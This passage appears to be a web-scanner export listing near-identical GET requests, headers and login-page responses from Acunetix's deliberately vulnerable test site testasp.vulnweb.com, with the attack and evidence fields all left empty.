<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 